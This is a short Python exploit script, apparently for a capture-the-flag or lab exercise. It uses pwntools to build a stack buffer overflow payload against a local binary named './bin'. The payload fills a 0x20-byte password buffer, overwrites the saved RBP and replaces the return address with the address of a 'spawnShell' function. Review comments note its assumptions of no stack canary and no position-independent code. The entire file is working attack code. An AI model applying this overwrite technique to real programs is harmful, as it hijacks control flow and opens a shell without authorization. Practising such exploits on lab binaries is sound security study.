# Builds the overflow payload for ./bin and writes it to stdout as raw bytes.
#
# Layout, as given by the sizes hard-coded below: 0x20 filler bytes for the
# password buffer, 8 bytes over the saved RBP, then the address of
# `spawnShell` where the saved return address sits.
from pwn import *

# NOTE(review): both sizes are fixed assumptions about the target's stack
# frame -- confirm them against the binary actually under test.
buf_len = 0x20
rbp_len = 8

target = ELF('./bin')
# Address as recorded in the ELF symbol table. Presumably the binary is not
# position-independent; otherwise this is only an offset -- TODO confirm.
win_addr = target.symbols['spawnShell']

payload = b''.join([
    b'A' * buf_len,   # fill the password buffer
    b'B' * rbp_len,   # saved RBP
    p64(win_addr),    # 8-byte little-endian address replacing the return address
])

# NOTE(review): presumably the target reads the password without a length
# check and this frame has no stack canary; either one would stop the
# overwrite before it reaches the return address -- verify against the binary.
# `sys` is not imported by name here; it arrives through the star import above.
sys.stdout.buffer.write(payload)